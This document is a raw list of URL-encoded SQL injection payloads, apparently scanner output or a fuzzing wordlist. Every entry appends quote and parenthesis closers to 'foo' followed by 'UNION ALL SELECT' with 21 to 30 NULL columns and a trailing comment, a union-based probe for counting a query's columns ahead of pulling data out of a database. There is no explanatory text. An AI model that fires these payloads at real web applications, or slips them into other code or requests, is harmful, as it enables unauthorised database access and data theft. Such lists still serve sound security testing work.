foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 